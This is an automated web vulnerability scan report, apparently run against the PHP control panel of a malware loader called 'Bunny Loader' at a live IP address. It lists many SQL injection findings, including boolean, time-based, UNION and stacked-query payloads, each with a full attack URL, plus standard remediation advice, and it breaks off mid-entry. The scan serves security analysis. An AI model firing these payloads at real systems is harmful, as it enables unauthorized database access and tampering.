Bunny Loader 3.1v 3/10/24 Vulnerability Scan RawPHP_DG
| Risk Level | Number of Alerts |
|---|---|
|
High
|
19
|
|
Medium
|
12
|
|
Low
|
10
|
|
Informational
|
24
|
| HTTP Response Code | Number of Responses |
|---|
| Parameter Name | Type | Flags | Times Used | # Values |
|---|
| HTTP Response Code | Number of Responses |
|---|---|
| 413 Payload Too Large |
56
|
| 403 Forbidden |
184594
|
| 414 URI Too Long |
28762
|
| 404 Not Found |
368474
|
| 206 Partial Content |
5605
|
| 200 OK |
87787
|
| 301 Moved Permanently |
872
|
| 400 Bad Request |
7223
|
| 302 Found |
9
|
| Authentication Statistics | Number of Responses |
|---|---|
|
!reports.report.stats.auth.browser.passed!
|
2
|
|
!reports.report.stats.auth.browser.foundfields!
|
2
|
|
!reports.report.stats.auth.sessiontoken.PHPSESSID!
|
5046
|
|
State : No Indicator
|
39
|
| Technology | Version | Categories | Implies |
|---|---|---|---|
|
Apache HTTP Server
|
2.4.58
|
Web servers
|
|
|
Bootstrap
|
4.5.2
|
UI frameworks
|
|
|
BootstrapCDN
|
4.5.2
|
CDN
|
|
|
cdnjs
|
CDN
|
Cloudflare
|
|
|
Chart.js
|
JavaScript graphics
|
||
|
Cloudflare
|
CDN
|
||
|
Font Awesome
|
6.0.0
|
Font scripts
|
|
|
jQuery
|
3.5.1
|
JavaScript libraries
|
|
|
jQuery CDN
|
CDN
|
jQuery
|
|
|
jsDelivr
|
CDN
|
||
|
OpenSSL
|
3.1.3
|
Web server extensions
|
|
|
PHP
|
8.2.12
|
Programming languages
|
|
|
Popper
|
2.9.1
|
Miscellaneous
|
|
|
Windows Server
|
Operating systems
|
| Parameter Name | Type | Flags | Times Used | # Values |
|---|
|
High |
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54%27%29%29+AND+7912%3D1403+AND+%28%28%27vmhR%27+LIKE+%27vmhR |
| Method | GET |
| Parameter | id |
| Attack | 54')) AND 6789=6789 AND (('gXVD' LIKE 'gXVD |
| Evidence | |
| Request Header - size: 752 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV%29+AND+1534%3D9087+AND+%284583%3D4583&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV) AND 4080=4080 AND (5432=5432 |
| Evidence | |
| Request Header - size: 754 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54%25%22+AND+9750%3D1167+AND+%22%25%22%3D%22 |
| Method | GET |
| Parameter | id |
| Attack | 54%" AND 8365=8365 AND "%"=" |
| Evidence | |
| Request Header - size: 807 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%22+AND+4111%3D4019+AND+%22Uzoz%22%3D%22Uzoz |
| Method | GET |
| Parameter | id |
| Attack | 54" AND 1752=1752 AND "VyqD"="VyqD |
| Evidence | |
| Request Header - size: 743 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%27+AND+8878%3D3300 |
| Method | GET |
| Parameter | query |
| Attack | query' AND 4219=4219 |
| Evidence | |
| Request Header - size: 485 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 333 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | task_select |
| Attack | 1%' AND 7527=7527 AND '%'=' |
| Evidence | |
| Request Header - size: 850 bytes. | |
| Request Body - size: 180 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| Instances | 6 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Generic comment) |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query+AND+7293%3D4638--+- |
| Method | GET |
| Parameter | query |
| Attack | query AND 5117=5117-- - |
| Evidence | |
| Request Header - size: 490 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 335 bytes. | |
| Response Body - size: 154 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=query%22%29+AND+3961%3D3329--+- |
| Method | GET |
| Parameter | query |
| Attack | query") AND 6329=6329-- - |
| Evidence | |
| Request Header - size: 486 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?query=query+AND+3439%3D5093--+- |
| Method | GET |
| Parameter | query |
| Attack | query AND 5756=5756-- - |
| Evidence | |
| Request Header - size: 662 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV+AND+9029%3D6759--+-&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV AND 9899=9899-- - |
| Evidence | |
| Request Header - size: 785 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27%27%29%29+AND+6761%3D4003--+-&bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | command |
| Attack | '1'=1'')) AND 9886=9886-- - |
| Evidence | |
| Request Header - size: 816 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | unit_EXEC |
| Attack | 18.9 AND 7130=7130-- - |
| Evidence | |
| Request Header - size: 850 bytes. | |
| Request Body - size: 158 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| Instances | 6 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54%27%29%29%29+AND+1524%3D6642%2516 |
| Method | GET |
| Parameter | id |
| Attack | 54'))) AND 3826=3826%16 |
| Evidence | |
| Request Header - size: 749 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27%29+AND+6750%3D6907%2516&id=54 |
| Method | GET |
| Parameter | value |
| Attack | '1'=1') AND 4774=4774%16 |
| Evidence | |
| Request Header - size: 789 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%25%27%29%29+AND+3912%3D6599%2516 |
| Method | POST |
| Parameter | id |
| Attack | 54%')) AND 1623=1623%16 |
| Evidence | |
| Request Header - size: 883 bytes. | |
| Request Body - size: 138 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| Instances | 3 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (MySQL comment) |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects?query=query%27+AND+9600%3D8462%23 |
| Method | GET |
| Parameter | query |
| Attack | query' AND 2652=2652# |
| Evidence | |
| Request Header - size: 497 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--?query=query%25%27+AND+8574%3D4031%23 |
| Method | GET |
| Parameter | query |
| Attack | query%' AND 8547=8547# |
| Evidence | |
| Request Header - size: 481 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%25%22+AND+7672%3D2978%23 |
| Method | GET |
| Parameter | query |
| Attack | query%" AND 1286=1286# |
| Evidence | |
| Request Header - size: 283 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%29+AND+2865%3D5035%23 |
| Method | GET |
| Parameter | query |
| Attack | query) AND 9928=9928# |
| Evidence | |
| Request Header - size: 280 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%27+AND+9178%3D7531%23 |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND 1570=1570# |
| Evidence | |
| Request Header - size: 1,078 bytes. | |
| Request Body - size: 129 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | params |
| Attack | ' UNION SELECT @@version -- - AND 1726=1726# |
| Evidence | |
| Request Header - size: 850 bytes. | |
| Request Body - size: 157 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%29%29+AND+6674%3D5309%23 |
| Method | POST |
| Parameter | id |
| Attack | 54')) AND 4365=4365# |
| Evidence | |
| Request Header - size: 878 bytes. | |
| Request Body - size: 138 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| Instances | 7 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%25%27%3BIF%286448%3D5605%29+SELECT+6448+ELSE+DROP+FUNCTION+rLMz--&task_select=1¶ms=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs= |
| Method | GET |
| Parameter | id |
| Attack | 54%';IF(7722=7722) SELECT 7722 ELSE DROP FUNCTION MRvj-- |
| Evidence | |
| Request Header - size: 1,033 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| Instances | 1 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - MySQL < 5.0 boolean-based blind - Parameter replace (original value) |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=%28SELECT+%28CASE+WHEN+%287490%3D9017%29+THEN+%27+ELSE+7490*%28SELECT+7490+FROM+mysql.db%29+END%29%29 |
| Method | GET |
| Parameter | query |
| Attack | (SELECT (CASE WHEN (4536=4536) THEN ' ELSE 4536*(SELECT 4536 FROM mysql.db) END)) |
| Evidence | |
| Request Header - size: 370 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| Instances | 1 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - MySQL > 5.0.11 stacked queries (comment) |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | params |
| Attack | ' UNION SELECT @@version -- -));SELECT SLEEP(5)# |
| Evidence | |
| Request Header - size: 850 bytes. | |
| Request Body - size: 169 bytes. | |
| Response Header - size: 14 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 1 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"")) AND SLEEP(5) AND (("PQXH"="PQXH |
| Evidence | |
| Request Header - size: 779 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| Instances | 1 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind (SELECT) |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | params |
| Attack | ' UNION SELECT @@version -- -) AND (SELECT * FROM (SELECT(SLEEP(5)))kgZD) |
| Evidence | |
| Request Header - size: 850 bytes. | |
| Request Body - size: 200 bytes. | |
| Response Header - size: 14 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 1 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%27%29+AND+MAKE_SET%282815%3D4252%2C4252%29+AND+%28%27ueQl%27%3D%27ueQl |
| Method | POST |
| Parameter | query |
| Attack | query') AND MAKE_SET(6740=6740,6078) AND ('Hgka'='Hgka |
| Evidence | |
| Request Header - size: 349 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| Instances | 1 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1?query=query%22%29+RLIKE+%28SELECT+%28CASE+WHEN+%284126%3D5859%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%22YByN%22%3D%22YByN |
| Method | GET |
| Parameter | query |
| Attack | query") RLIKE (SELECT (CASE WHEN (3115=3115) THEN 0x7175657279 ELSE 0x28 END)) AND ("lLCV"="lLCV |
| Evidence | |
| Request Header - size: 388 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query%25%27%29%29+RLIKE+%28SELECT+%28CASE+WHEN+%282121%3D7848%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%28%27%25%27%3D%27 |
| Method | GET |
| Parameter | query |
| Attack | query%')) RLIKE (SELECT (CASE WHEN (8694=8694) THEN 0x7175657279 ELSE 0x28 END)) AND (('%'=' |
| Evidence | |
| Request Header - size: 593 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua-mobile |
| Attack | ?0') RLIKE (SELECT (CASE WHEN (8958=8958) THEN 0x3f30 ELSE 0x28 END)) AND ('IIJx' LIKE 'IIJx |
| Evidence | |
| Request Header - size: 789 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1%25%27+RLIKE+%28SELECT+%28CASE+WHEN+%289656%3D7648%29+THEN+1+ELSE+0x28+END%29%29+AND+%27%25%27%3D%27¶ms=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs= |
| Method | GET |
| Parameter | task_select |
| Attack | 1%' RLIKE (SELECT (CASE WHEN (6114=6114) THEN 1 ELSE 0x28 END)) AND '%'=' |
| Evidence | |
| Request Header - size: 1,067 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS%25')%20RLIKE%20(SELECT%20(CASE%20WHEN%20(7616=5031)%20THEN%200x54515549413732394a41554c414d4a53%20ELSE%200x28%20END))%20AND%20('%25'='/tasks_page.php |
| Method | POST |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS%') RLIKE (SELECT (CASE WHEN (2926=2926) THEN 0x54515549413732394a41554c414d4a53 ELSE 0x28 END)) AND ('%'=' |
| Evidence | |
| Request Header - size: 609 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 204 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%29%29+RLIKE+%28SELECT+%28CASE+WHEN+%283791%3D4771%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%284078%3D4078 |
| Method | POST |
| Parameter | query |
| Attack | query)) RLIKE (SELECT (CASE WHEN (8670=8670) THEN 0x7175657279 ELSE 0x28 END)) AND ((7410=7410 |
| Evidence | |
| Request Header - size: 599 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| Instances | 6 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - PostgreSQL boolean-based blind - Stacked queries |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV%3BSELECT+%28CASE+WHEN+%285664%3D7016%29+THEN+5664+ELSE+1%2F%28SELECT+0%29+END%29--&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV;SELECT (CASE WHEN (3792=3792) THEN 3792 ELSE 1/(SELECT 0) END)-- |
| Evidence | |
| Request Header - size: 870 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| Instances | 1 |
| Solution |
